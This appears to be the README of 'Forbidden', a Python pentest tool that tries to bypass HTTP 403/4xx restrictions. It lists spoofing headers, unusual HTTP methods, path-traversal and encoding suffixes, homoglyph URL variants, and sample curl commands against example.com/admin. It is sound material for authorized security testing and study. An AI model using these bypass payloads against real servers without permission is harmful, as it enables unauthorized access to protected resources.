Forbidden
Bypass 4xx HTTP response status codes.
To see all the test cases, check the source code - follow the NOTE comments.
Script uses multithreading, and is based on brute forcing so might have some false positives. Script uses colored output.
Extend this script to your liking.
Tested on Kali Linux v2021.4 (64-bit).
Made for educational purposes. I hope it will help!
Future plans:
- file uploads with HTTP PUT,
- cross-site tracing (XST),
- basic authentication.
Table of Contents
How to Run
Open your preferred console from /src/ and run the commands shown below.
Install required packages:
pip3 install -r requirements.txt
Run the script:
python3 forbidden.py
Download a user agent list from here.
Parsed URL Format
To see all the default values used in the script, check the source code - follow the NOTE comments.
{
"urls": [
"http://example.com/admin",
"http://ᴱxᴬᴹᴾᴸᴱ.cᴼᴹ/ᴬᴰᴹᴵᴺ"
],
"scheme_domains": [
"http://example.com",
"http://ᴱxᴬᴹᴾᴸᴱ.cᴼᴹ"
],
"domains": [
"example.com",
"ᴱxᴬᴹᴾᴸᴱ.cᴼᴹ"
],
"paths": [
"admin",
"/admin",
"admin/",
"/admin/",
"ᴬᴰᴹᴵᴺ",
"/ᴬᴰᴹᴵᴺ",
"ᴬᴰᴹᴵᴺ/",
"/ᴬᴰᴹᴵᴺ/"
],
"all": [
"http://example.com/admin",
"http://ᴱxᴬᴹᴾᴸᴱ.cᴼᴹ/ᴬᴰᴹᴵᴺ",
"http://example.com",
"http://ᴱxᴬᴹᴾᴸᴱ.cᴼᴹ",
"example.com",
"ᴱxᴬᴹᴾᴸᴱ.cᴼᴹ",
"admin",
"/admin",
"admin/",
"/admin/",
"ᴬᴰᴹᴵᴺ",
"/ᴬᴰᴹᴵᴺ",
"ᴬᴰᴹᴵᴺ/",
"/ᴬᴰᴹᴵᴺ/"
]
}
HTTP Headers
Client-IP
Cluster-Client-IP
Connection
Contact
Forwarded
Forwarded-For
Forwarded-For-Ip
From
Host
Origin
Referer
Stuff
True-Client-IP
X-Client-IP
X-Custom-IP-Authorization
X-Forward
X-Forwarded
X-Forwarded-By
X-Forwarded-For
X-Forwarded-For-Original
X-Forwarded-Host
X-Forwarded-Server
X-Forward-For
X-Forwared-Host
X-Host
X-HTTP-Host-Override
X-Original-URL
X-Originating-IP
X-Override-URL
X-ProxyUser-IP
X-Real-IP
X-Remote-Addr
X-Remote-IP
X-Rewrite-URL
X-Wap-Profile
X-Server-IP
X-Target
HTTP Methods
ACL
ARBITRARY
BASELINE-CONTROL
BIND
CHECKIN
CHECKOUT
CONNECT
COPY
DELETE
GET
HEAD
INDEX
LABEL
LINK
LOCK
MERGE
MKACTIVITY
MKCALENDAR
MKCOL
MKREDIRECTREF
MKWORKSPACE
MOVE
OPTIONS
ORDERPATCH
PATCH
POST
PRI
PROPFIND
PROPPATCH
PUT
REBIND
REPORT
SEARCH
SHOWMETHOD
SPACEJUMP
TEXTSEARCH
TRACE
TRACK
UNBIND
UNCHECKOUT
UNLINK
UNLOCK
UPDATE
UPDATEREDIRECTREF
VERSION-CONTROL
URL Paths
/
//
/%2e
/%2e/
/.
/./
/..
/../
/;
/;/
/.;
/.;/
/..;
/..;/
%20
%20/
%09
%09/
;foo=bar;
/;foo=bar;
;foo=bar;/
/;foo=bar;/
~
~~
/~randomstring
#
##
/#randomstring
?
??
/?randomstring
/*
/**
/*randomstring
.jsp
.jspa
.jspx
.jhtml
.html
.sht
.shtml
.xhtml
.php
.asp
.aspx
.esp
Results Format
[
{
"id": 9,
"url": "https://example.com/admin",
"method": "GET",
"headers": [
"Host: localhost"
],
"agent": null,
"command": "curl -i -s -m 3 --connect-timeout 3 -k -L --path-as-is -H 'Host: localhost' -X 'GET' 'https://example.com/admin'",
"code": "302",
"length": "142"
},
{
"id": 49,
"url": "https://example.com/admin",
"method": "GET",
"headers": [
"Host: localhost:80"
],
"agent": null,
"command": "curl -i -s -m 3 --connect-timeout 3 -k -L --path-as-is -H 'Host: localhost:80' -X 'GET' 'https://example.com/admin'",
"code": "302",
"length": "142"
},
{
"id": 169,
"url": "https://example.com/admin",
"method": "GET",
"headers": [
"Host: 127.0.0.1"
],
"agent": null,
"command": "curl -i -s -m 3 --connect-timeout 3 -k -L --path-as-is -H 'Host: 127.0.0.1' -X 'GET' 'https://example.com/admin'",
"code": "302",
"length": "142"
},
{
"id": 209,
"url": "https://example.com/admin",
"method": "GET",
"headers": [
"Host: 127.0.0.1:80"
],
"agent": null,
"command": "curl -i -s -m 3 --connect-timeout 3 -k -L --path-as-is -H 'Host: 127.0.0.1:80' -X 'GET' 'https://example.com/admin'",
"code": "302",
"length": "142"
}
]
Images
Figure 1 - Help
81 Dec 12, 2022
12 Dec 17, 2022
9 Dec 12, 2022
854 Dec 30, 2022
29.7k Jan 4, 2023
76 Nov 30, 2022
34 Nov 15, 2022
33 Sep 23, 2022
820 Dec 18, 2022
4.3k Jan 5, 2023
259 Dec 31, 2022
11 Aug 27, 2022
17 Aug 23, 2021
312 Dec 9, 2022
23 Dec 2, 2022
6 Sep 8, 2022
30 Nov 22, 2022
1 Jan 11, 2022
135 Dec 14, 2022